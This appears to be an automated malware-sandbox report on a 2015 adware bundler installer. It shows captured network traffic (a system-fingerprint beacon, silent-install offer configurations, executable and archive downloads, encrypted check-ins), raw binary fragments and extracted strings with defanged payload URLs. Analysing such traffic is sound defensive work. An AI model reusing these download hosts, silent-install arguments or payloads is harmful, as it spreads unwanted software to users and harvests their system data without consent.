installer_data={"uid":"78E613EC0FD24B388D7E6C851DDC4F6F","muid":"9e10bdd7664ab688d1d7f2ab0b148110","affid":"vuupcntmb","sid":"vuupculwo","installerVersion":"2.2.2","osVersion":"5.1.2600 32bit","ieVersion":"6.0.2900.5512","ff_installed":"0","ff_version":"","ff_default_homepage":"not_found","ff_is_default":"0","ie_installed":"1","ie_version":"6.0.2900.5512","ie_default_homepage":"about:blank","ie_is_default":"0","chrome_installed":"0","chrome_version":"","chrome_default_homepage":"not_found","chrome_is_default":"0","opera_installed":"0","opera_version":"","opera_default_homepage":"not_found","opera_is_default":"0","safari_installed":"0","safari_version":"","safari_default_homepage":"not_found","safari_is_default":"0","check_4":"false","check_586":"false","check_1842":"false","check_2182":"false","check_2246":"false","check_2450":"false","check_3850":"false","check_1282":"false","check_1284":"false","check_1522":"false","check_1592":"false","check_1634":"false","check_1788":"false","check_1790":"false
HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx
Date: Sun, 06 Sep 2015 22:59:20 GMT
Vary: Accept-Encoding
Expires: Sun, 06 Sep 2015 20:12:40 GMT
Cache-Control: no-cache
X-Cache: Miss from cloudfront
Via: 1.1 1fcd1033bfe42d3b0b03eb4bfbf9624a.cloudfront.net (CloudFront)
X-Amz-Cf-Id: euTJcqjbD-fHaGi0YiQfAt6_KwmT_b3PqaApIqHCK3MbopKnXIbtHA==
1778..<?xml version="1.0" encoding="windows-1252"?>.<sponsored_data><downloader><url>hXXp://sub.spirlymo.com/installers/bi_downloader/1441577004706/setup.exe</url><downloadOnInit>1</downloadOnInit><args>/silent /initurl hXXp://sub.yorkshatb.com/downloader/:affid:/:sid:/:uid:? -uid="%UID%" -sid="%SoftwareID%" -affid="¯filiateID%" -muid="%MUID%"</args></downloader><offers><offer id="istartsurf"><remote_resources/><downloader><args>_!delimiter!_ -offerId="%OfferID%" -softwareName="Istartsurf"</args></downloader><title>Special Offer</title><sub_title>To go along with your Vuupc</sub_title><download_url>hXXp://d2drfrdurj6mvo.cloudfront.net/liyan/smt_istartsurf.exe</download_url><execution_arguments>-silence -ptid=smt</execution_arguments><options><option type="v_space" height="5"/><option type="text" width="100"><id>descriptionElement</id><text><decor type="text">Make Istartsurf my browser homepage, default search and new tab</decor></text></option><option type="v_space" height="5"/><option type="text" width="100"><id>footerElement</id><text><decor type="text">By clicking Next you are agreeing to Istartsurf</decor><decor type="link" href="hXXp://VVV.istartsurf.com/license_agreement.html">Terms of Use</decor><decor type="text">and</decor><de
<<< skipped >>>
GET /crossbrowse/ie/107/ie.zip.001 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 06 Sep 2015 22:58:43 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441008912"
Last-Modified: Mon, 31 Aug 2015 08:15:12 GMT
Cache-Control: max-age=40537
Content-Length: 8244985
Content-Type: text/plain; charset=UTF-8
X-HW: 1441580323.dop018.am4.t,1441580323.cds046.am4.c
PK........l..G...nd.T.d.T.....chrome.packed.7z7z..'.....T...T.............*..F......8%D.cT(g.....,r...E^<5....S$<....Z..*...7&.o.,.a&......%...1..5...m...h..=w.|.a.a.Q.{.<..:..9Q,>n...k.....~..aJ.._...KD.V...7.>..3....d......)..6.H..RN...:.....FU.!..j...9....L.&.2.a........ .E.s'T.......vD.z)..}..-.. .&.vF}.$.z.......lw.>..!...'.a..|...L....09E..Y8^.s.O\..C..%.......d.VD....W..d.'..6%...l.7Gk.<..I...5...d !......wT...d...H..7v.E.......{.p.]`.......~w84.rj......;...).q.k..G...........zL...{....>.."........"q..k[.f...F{8...s..c>[69..|...q].(.S..~..1z..>.!AT&i.}....YJ....\i....o..(...4.5.......h|.......6.!...4.p[....@.m.. ^&...A..&E..V.]...T=.v]W.l=A=y.T....R.'f.....60..MR...k...c.1."..jw.7C.N...b....@...@....%..%*!5............iW*y..*......E...D....6....3.P....2.....} .'..!...cG.m...Z.]%{.QZ./e.V-C.a.X.aQ?.....S..1...:.T..C*..hKH....(...aH.r..;..^.l.ikR.X..8..._...^T{B@..'.tga.3."..<. ...........$c9......... .~)/..%.2{...X&.W.....>...bh.L.....U.-.Vf......r..d..9. ..k.'.M...J...v...rU..`3...SWX...G1.`....{.....8.~..x..Q...g.._...1.9.......f8..#p..............]...E.(....J....(H.h..6@'.hc.5....}.1>{..6/.R.....(X.k.<....\.....:p...u..L.....h...K...vaK./.O........'|...8..2...{..9....."&.......Z..K.eJ..4e..)v..[...J$.e........5.G......X..@.o.^Y...%....._.n.:...\......H...0,.f.E...*M.F.f.R.lJ*,...S.....FE*'b.#V.@........a=._.....W... .}.....p.~..(>.....E.1k....3k....F..[.T...,N...............Y7.......G[....rH).E......[.5..K..Q..J#8.-.@.]<eh........2a.c.8...Z....O.....z..2c
<<< skipped >>>
GET /cgi-bin/get_protect.cgi?checking=true&version=gmsd_us_233&forceGEO=US HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: prof.eorezo.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 06 Sep 2015 22:58:59 GMT
Server: Apache/2.2.22
x-eorezo-crc32: -1
x-eorezo-crypted: 1
x-eorezo-length: 357
Set-Cookie: conftime=1441580339; expires=Fri, 31 Dec 15 16:45:00 GMT; domain=eorezo.com; path=/;
Set-Cookie: EoRezo=194.242.96.218.1441580339793277; path=/; expires=Tue, 06-Oct-15 22:58:59 GMT
Connection: close
Transfer-Encoding: chunked
Content-Type: text/plain
1ec..Xg8nssf/4H10OdRv/PBlQCyF9RkAzpy/PPG8paJnu rCw3mAaqFpX2 ZKEgbMMA2htCshaMIPoMPkSppoNIfvqD ZyWxTIl1LyUx8yWjlHHNhn1WF5uF0H6qLM uZMwkTiGldZX5iSj uCsroOrbj/qdFgfbU9hmNOF2lZWiRA4D1nmKWD56o30N03aMe cM TaH0Zt8tkkpVIrV86sjShA2ibI4frmimtvqttCmZq2iOlFsKeYNJxrj/jP12cx2lA7NiBrk4PKXXug7tpKb65atNqDRlvUKKAF9c9zPzn4F2eh8GAfVbPOtZhSf/o/50RLSfemcISdhtiO8gTINReeSoYdUAqhmbrscZPjwnJCjKfgrUbQCV1J0DBwv2J mQsGJZQH4xDticU8Aw3zUoh3vFhu1Wg3CUqlkPjaoTHwm7LcFgkhAy A9qiL9G3nGtxC4eGJD3HM29TeMBpi5wjFtJRirkgPWAr1gnD hmf0=..0..
GET /crossbrowse/ie/107/ie.zip.005 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 06 Sep 2015 22:58:43 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441008913"
Last-Modified: Mon, 31 Aug 2015 08:15:13 GMT
Cache-Control: max-age=40532
Content-Length: 8244985
Content-Type: text/plain; charset=UTF-8
X-HW: 1441580323.dop018.am4.t,1441580323.cds046.am4.c
[..Wa<.3.......Y.}S.Q)|.x.P..r._ip`...h.r...@..k.....8..o.D_C.0.h..M...gv......J..g.....a.4..~....A.Y.. .u:7..... i...$.....p...ORP.P... ....._.@......?.F.....8.@..l....{n...XGi......2..........FOqM..N_.}...S*he.I.q.. ..V...=.E....1....M.S.......f3%.?.....Ug.\.}...I..g..w..[....t..yR..DJ3.;.;W...._.....y.:..XZ<..40a.I..A...vUW..,...u"......>..*.....@D...YX.4.......v]...T.$..T.1...2.X..o.X....@.%...n.LL....-..A...n.......uq<.r$..t`M.:c9C..l./....}2.......{.O...7............;...M..x...rwqL.\.. ..b.........*f!..S|..*g...'dl..........eN..km...:.6.....s....n.5..0_r8 D.W...".S/%r.rU..c.......C.v5..C...3..z....\.B.-a..r......|..G..W.....2h..>jSy....Z.........tE...T....R.2...p..Q>...f.fj.#.Z.l....7..h.....>...-..K...<....?....B..........,.....$..~........^..V...Uq.672kCC......i....J....*...K.......0..14....{.Wwf".K.p....;.6.H."6y.q.E~. i.`...hN.....d../\A....hY.$!}3..7.*&.n......Z...Q>W.......`0.q..M..A@*.Y 0..7l"m......0...4..X2.|.C2j.[..K...gu...?.a..s.B.kX......j.t...B@|d.l._.zZ.. ."D(..PD..l?.%..w.....).v,v9m...w........G..C.SU.l7*JlW.....56.....v..{............G..3..0....R......Y.h,u..k.'.....$..&.[.9.. 8..1..DZF....n......l_.......*.R...Q$.3.q\..'...]...k..*..0....^#.|A.v...K...........T.Q.#...^e.c....V\..ysD.Ai^.ly..P.~..lreD.g_.Q.....i..kS.R...f..=9.9..q=D."......-N...C.....%.-..u.....<.qj..:..s......:>.I`.PJ..vQ.K.....o.)qew.K.G....w.....tJ.a4...L.[.......0.0#.),......7....J}*..^`w..Q.h...~e..Ql..*..|}...K.Z.*..'.....|..rp.@_.b..!..R.%....%..m"....W9..$ 1.......VZ..''.1,|..V...
<<< skipped >>>
GET /7121923af824073a25b2b7e6ba0a6e0e.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d1mdi78qyff344.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/x-msdownload
Content-Length: 59213
Connection: keep-alive
Date: Thu, 27 Aug 2015 02:50:12 GMT
Last-Modified: Wed, 26 Aug 2015 15:24:15 GMT
ETag: "ad3ce40da858a76f235974af46c18365"
Accept-Ranges: bytes
Server: AmazonS3
Age: 82744
X-Cache: Hit from cloudfront
Via: 1.1 affe26bf02a36a4a45ea1eb3ce2b4a62.cloudfront.net (CloudFront)
X-Amz-Cf-Id: hV4eTiJxA1GZYRgQhVPavmFWw76jIRgozWb7-_GuvZ9W1pwOL14mGQ==
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@..........................`...............................................t.......P...............................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...`...............................rsrc........P.......z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
GET /SysInfo/Validate.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: download-servers.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Sun, 06 Sep 2015 22:58:37 GMT
Content-Type: application/octet-stream
Content-Length: 61981
Last-Modified: Fri, 15 May 2015 22:16:55 GMT
Connection: keep-alive
ETag: "55567057-f21d"
Accept-Ranges: bytes
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@.......................... ...............................................t...........C...........................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...................................rsrc....C.......D...z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=134153&tag=RE_CLICKMEIN_INSTALL_INI HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ads.regiedepub.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 06 Sep 2015 22:58:59 GMT
Server: Apache/2.2.22 (Debian) mod_ssl/2.2.22 OpenSSL/1.0.1e mod_wsgi/3.3 Python/2.7.3 mod_perl/2.0.7 Perl/v5.14.2
Content-Location: settags.cgi
Vary: negotiate
TCN: choice
Cache-Control: no-store, no-cache, must-revalidate
X-C4PC-ServerName: ads.regiedepub.com
P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Expires: Sun, 06 Sep 15 22:59:00 GMT
Set-Cookie: _c4aid=C279EF6B66154A66BFF80ABC380EC9BE; expires=Fri, 04 Mar 16 22:58:00 GMT; domain=regiedepub.com; path=/;
Set-Cookie: _c4aid2=C279EF6B66154A66BFF80ABC380EC9BE,1441580339.9876; expires=Fri, 04 Mar 16 22:58:00 GMT; domain=regiedepub.com; path=/;
Connection: close
Transfer-Encoding: chunked
Content-Type: text/javascript
41.......if (window.rdp_callback).....rdp_callback(1203, 134153);......0..
POST /cgi-bin/get_protect.cgi HTTP/1.1
x-spidermessenger-crypted: 2
x-spidermessenger-crc32: 3033805887
x-spidermessenger-length: 275
Content-Type: text/*
User-Agent: gmsd_re_005010082-gmsd_re_005010082
Host: prof.youandmeandmeandyouhihi.com
Content-Length: 388
Cache-Control: no-cache
ujXl2iaEv38K+/yRWyXC+m7rYR+qMqcs9YxhFIEq0IR+DeoNyHhucH3AWCVIM82OvKfaWpH1ZSOWy0Dpia69T3lIMCvCR21OveDZQ/XXXEvKY08Z6zRaY5GekUZHva3ixQp/A61qO8X6fSTpS9M1hVPOQ0hf1UMUk0ir+EApjvuFovnG57lLgOpZQ3o+GoqOM8Q8RTj7e8FyaU3C4vA8ueT34pG6WhOzc02xXp1+ZsXsTEsL0fbxYWOrh42PrO0BS6mrwoyRj9lKiE4lmoNaenzgQyJ3OF2bhWxHTdLDBp9FVeWxaD4HzC5aFB62wTeejj7+o27gpsmVxMOlRwDVzzJBCyUcSdg8pdyTmkVZTOc=
HTTP/1.1 200 OK
Date: Sun, 06 Sep 2015 22:59:06 GMT
Server: Apache/2.2.22
x-SPIDERMESSENGER-crypted: 2
x-SPIDERMESSENGER-length: 26780
x-SPIDERMESSENGER-crc32: -1
Set-Cookie: conftime=1441580346; expires=Fri, 31 Dec 15 16:45:00 GMT; domain=youandmeandmeandyouhihi.com; path=/;
Set-Cookie: EoRezo=194.242.96.218.1441580346384969; path=/; expires=Tue, 06-Oct-15 22:59:06 GMT
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
Content-Type: text/plain
8b8c..0NogVEVNeZU/g6fcxXpPm8L/TbLACp6qNZeGXV8m6ec/K8dk0/yY5pEI4yS2Vf5K1CwWkZ8xeq2FoHZiTq7fWERGyCAg88jpdmzVknJJbtdhSvgVLNEQZKmNKxPN3kfibTew3 ynOvjDhwwNX4fU19cLBEHf1q/Xj32GKoBkNDpFEvQc2RNtJ53wo0SzNY73Ov0OwqXrzI2YO2u8inUw0nO7c1EmhCQa2i/vBM3WBxToytgI8AOZc7DjCjAaRYTOA9U3l7UzRV6FAZu2v4g3ulzh/9x1IGPxQZ ffhxpadw/DzrvkqIcDjnYcLzX2/T6mdAgziXQ1zS9fntDExMPzF4mEGRvMVaLVzLB/0YVBFquldZVsV4h9unpiSbw1f3qQ5EFPlQi26/QJv 3kNlNdp tr/lkOeFrVL83yFaGdpsYkXakmn7Pt7ZivEIj95W3RVcyfN9hm0pt/TqXb B3S1ofXW8r6p 4AWkKyzijRV7iyih3ub9ayKXA6INIGTlp9lzBIZq/DXhICiLT3fYXBCAsiy0fZ vtup2vHkkbVzdvTa3d2qnNFhAny8u3TD8A5GJnNUWGWZ/XIX1UAy6f8QLQ757q8lQgpFmZGWO3sIINr6HtSg4mw1wELaWkbtB2JSSQX1SDYf28innm5lOBkMMSpQykFY5IIgYrir2Cqb6w2v/KWlr TAcyuJY3pYjHl2scsWGsjJbClyG2dIIYCYsunQskBnasOo 0KTubN45K25nsH/9ochuVmgURbutJlRo9L/8J2yHJSHWAPy5UBXJhDyJrLp/A5cwUKUG2XTXoFkIYzsBSi4gF41BXlSNf5RW8 cUWdVC7g6whpHq5zdViEmK6TBVmPa0ywj0DampQIWGH6XAicRPzNPkA3pwGQPhRAhK1EQy674qbveGK0Dbggqpl9hPBcXr2h/QKUPtW8kDd5vUs6Bfoovyi kyj5OHQYJNVNNdM55Ipa23hIRbp5JewGq5JryjIJFiiaMsgOZqDnOfX6CWx HesvbGAlb/CalPV /Dc u7kOjLMvmrXRsT/6JORuj3YqV13x/PrYFPi8WugrRu9l1c4nUlzjd0ULa662scOvFhEuxPdkQPJFwrFL57keT5G8LZVER63WolNb39XBGEzhCVCeSeWchOVOZjXFuuH6on/U6smoF9yaH 6JS2vsXPUN7L84rp Kt5v C3KStZZHo/5vPjfyhixbp5u52FmBq/gosyIMKMItZUvnb6ai/ScNdtSn/4aqx8QplIoIxQAD0R tvc5SOU1q0Mr/5zFMRwXBIxKyy8fmp7alHdHZUHdmu6mmIUeQ6AxGqv442UewrTLJ3rwrfuE54X/BfMjZmRBBbiesg2SoVwfIMzrG/Cp/FIvjjy3u/y2JIdKWJKbEeEFZ4gS5WxFAUylpqdACC72Youxetp5EYkKQWOSg33xZRk/ifdsLDfkLGp82 ElytFTV8xkvfcaeKo0DNU1IkqQhLNqawVHAVj/FJ4gJt9UdHImFQX1cx2sK66CQRgZkz
<<< skipped >>>
GET /crossbrowse/ie/107/ie.zip.004 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 06 Sep 2015 22:58:43 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441008913"
Last-Modified: Mon, 31 Aug 2015 08:15:13 GMT
Cache-Control: max-age=40536
Content-Length: 8244985
Content-Type: text/plain; charset=UTF-8
X-HW: 1441580323.dop018.am4.t,1441580323.cds035.am4.c
......."`...P.PB.............z.....R^z......cxT...x... ;K.....8..9i....|9..7...D..p[.2..!!.S.._.^..Z..W..8.@.'..\&!.!k...~..4.......f.V.u...0...^......,T;.....%......ch...F..c.........G.2../l.wr 1.&.?!..r.k.U....}%....w....}.2...}......oD.KX.G....p...s...$.W...c.Q.*<.4...Lz...@r.g;....~..w#..........`..@..m...){..$.......=z...J23..Bp....~.2.j.......pJ..X..C... .U.O5..h............._W...)#....:_lk.b.Z'..]..s0...6Y%..W........<...cP\Y..G.u.,U..B.og...8.C.~.8~..tj...t ....TT.-UQ....M.....1N-.x....P.p.#...wI..W...G.[.jO..Q.2.V1=..,/.......~..........."..Hma..se...^?.k....=...5...p.....I..G.hm. .vD....._...[.l...,.......s....O.....WU.v-:'.j..%...|....7.g...'..o1..._m.,.!.n.V.........Y5...}s<t..G.R3;R;8.....yP=.-.N...l{..r9..4.n&...U4..n..p.W....{d/l......*....!O*.j.}...%Q.....k.j..1=^.@G....!jI..5.....^7.O. ...DwR.....J/.@..4d."... ..$...#..........Xc.R>Vv.......;.d..C..W....'.....8 .*4Xw.drM.^...UE.C...]>.....ycA.... ....l..:..z..y....=I......9.........z.y......uX.... .T..........d-dj.7.d.!Q.qCqj.4.S{.&.".......s;..P.\.l..7...-OP....I...._\.YX2.6.Mb..._...5O.4....e..tyo...z.z.2.8..5........W..7......|.$............^..]..x...|...S...$....F.|_.SS......=...'...`rX....y...e.O..b...............U9hPfr..5KJ6;&.....d.d.......... .j....Wu.:...hk...a..s...]......?..T.]..8.cRN...........6..C=[.k....`......s]$.B, ....7;A......... ^.h~{..\:ybG.$..f.Q..l........#..FB.. ..........;.,RS.4].B-...N.EyNE...q.P_..g..}AY~_gz......42...%......Nx..D.D.!.]...[..o.1..&....."W.........nKK..).....<.x.@............?.m......c
<<< skipped >>>
Map
The SpyTool connects to the servers at the folowing location(s):
Strings from Dumps
nskA.tmp_1676:
.text
.text
`.rdata
`.rdata
@.data
@.data
.ndata
.ndata
.rsrc
.rsrc
uDSSh
uDSSh
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
SHFileOperationA
SHFileOperationA
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
RegEnumKeyA
RegEnumKeyA
RegCreateKeyExA
RegCreateKeyExA
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
ole32.dll
ole32.dll
VERSION.dll
VERSION.dll
verifying installer: %d%%
verifying installer: %d%%
unpacking data: %d%%
unpacking data: %d%%
... %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
~nsu.tmp
%u.%u%s%s
%u.%u%s%s
RegDeleteKeyExA
RegDeleteKeyExA
%s=%s
%s=%s
*?|/":
*?|/":
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsc43.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsc43.tmp
360TotalSecurity.exe
360TotalSecurity.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsl10.tmp\inetc.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsl10.tmp\inetc.dll
hXXp://d10huri5h4o4a3.cloudfront.net/smt.exe
hXXp://d10huri5h4o4a3.cloudfront.net/smt.exe
33/este/re/setup_gmsd_re.exe&errorlevel=0
33/este/re/setup_gmsd_re.exe&errorlevel=0
hXXp://download-servers.com/partners/360/360TotalSecurity.exe
hXXp://download-servers.com/partners/360/360TotalSecurity.exe
/password
/password
Uploading %s
Uploading %s
8!8-8B8I8}8
8!8-8B8I8}8
@.reloc
@.reloc
HttpSendRequestA
HttpSendRequestA
HttpSendRequestExA
HttpSendRequestExA
HttpQueryInfoA
HttpQueryInfoA
FtpCreateDirectoryA
FtpCreateDirectoryA
FtpOpenFileA
FtpOpenFileA
HttpOpenRequestA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpEndRequestA
HttpEndRequestA
InternetCrackUrlA
InternetCrackUrlA
WININET.dll
WININET.dll
inetc.dll
inetc.dll
Open URL Error
Open URL Error
URL Parts Error
URL Parts Error
%dkB (%d%%) of %dkB @ %d.dkB/s
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
(%d %s%s remaining)
REST %d
REST %d
SIZE %s
SIZE %s
Content-Length: %d
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Authorization: basic %s
Proxy-authorization: basic %s
Proxy-authorization: basic %s
%s:%s
%s:%s
FtpCommandA
FtpCommandA
wininet.dll
wininet.dll
%u MB
%u MB
%u kB
%u kB
%u bytes
%u bytes
%d:d:d
%d:d:d
%s - %s
%s - %s
(Err=%d)
(Err=%d)
NSIS_Inetc (Mozilla)
NSIS_Inetc (Mozilla)
Filename: %s
Filename: %s
u.Uj@
u.Uj@
MSVCRT.dll
MSVCRT.dll
FtpCreateDir failed (550)
FtpCreateDir failed (550)
Error FTP path (550)
Error FTP path (550)
Downloading %s
Downloading %s
~y.Po
~y.Po
.tx__$
.tx__$
@h.Bm
@h.Bm
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nss44.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nss44.tmp
nss44.tmp
nss44.tmp
://livestatscounter.com/Generic/vos.php?ch=
://livestatscounter.com/Generic/vos.php?ch=
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nskA.tmp /idn
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nskA.tmp /idn
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsc43.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsc43.tmp
Uninstall.exe
Uninstall.exe
n.php?r=vu_vo2_
n.php?r=vu_vo2_
d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe
d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nskA.tmp /idn
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nskA.tmp /idn
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
nskA.tmp
nskA.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsqE.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsqE.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsl10.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsl10.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nskA.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nskA.tmp
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d10huri5h4o4a3.cloudfront.net/smt.exe&v=2\"}"}
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d10huri5h4o4a3.cloudfront.net/smt.exe&v=2\"}"}
e/setup_gmsd_re.exe&errorlevel=0&v=2\"}"}
e/setup_gmsd_re.exe&errorlevel=0&v=2\"}"}
hXXp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
hXXp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
url=hXXp://d10huri5h4o4a3.cloudfront.net/smt.exe
url=hXXp://d10huri5h4o4a3.cloudfront.net/smt.exe
/este/re/setup_gmsd_re.exe
/este/re/setup_gmsd_re.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw13.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw13.tmp
dlgen.php?r=vu_vo2_
dlgen.php?r=vu_vo2_
)-.Yln
)-.Yln
Nullsoft Install System v2.46
Nullsoft Install System v2.46
1.0.0.1
1.0.0.1
upgmsd_re_005010082.exe_380:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
RSSSSSSh
RSSSSSSh
t.hX0f
t.hX0f
QSShh
QSShh
tFHt:Ht.Ht"Hu`
tFHt:Ht.Ht"Hu`
SSSSh
SSSSh
u$SShe
u$SShe
tWSShW
tWSShW
tl9_ tgSSh
tl9_ tgSSh
t'SShl
t'SShl
SSSShx
SSSShx
j%XtL9E
j%XtL9E
FtPW
FtPW
SSh@B
SSh@B
u.SSh
u.SSh
tsSSh
tsSSh
FTCP
FTCP
t.WWWSP
t.WWWSP
tAHt.HHt
tAHt.HHt
FTPS
FTPS
u)SShF
u)SShF
s%j.Zf
s%j.Zf
xSSSh
xSSSh
FTPjKS
FTPjKS
FtPj;S
FtPj;S
C.PjRV
C.PjRV
operand of unlimited repeat could match the empty string
operand of unlimited repeat could match the empty string
POSIX named classes are supported only within a class
POSIX named classes are supported only within a class
erroffset passed as NULL
erroffset passed as NULL
POSIX collating elements are not supported
POSIX collating elements are not supported
this version of PCRE is not compiled with PCRE_UTF8 support
this version of PCRE is not compiled with PCRE_UTF8 support
PCRE does not support \L, \l, \N, \U, or \u
PCRE does not support \L, \l, \N, \U, or \u
support for \P, \p, and \X has not been compiled
support for \P, \p, and \X has not been compiled
(*VERB) with an argument is not supported
(*VERB) with an argument is not supported
!"#$%&'((()* ,-./01
!"#$%&'((()* ,-./01
CNotSupportedException
CNotSupportedException
CCmdTarget
CCmdTarget
RegOpenKeyTransactedW
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyTransactedW
CFtpFileFind
CFtpFileFind
CHttpConnection
CHttpConnection
CFtpConnection
CFtpConnection
CHttpFile
CHttpFile
RegDeleteKeyExW
RegDeleteKeyExW
TaskDialogIndirect
TaskDialogIndirect
CMDITabProxyWnd
CMDITabProxyWnd
CMDIChildWndEx
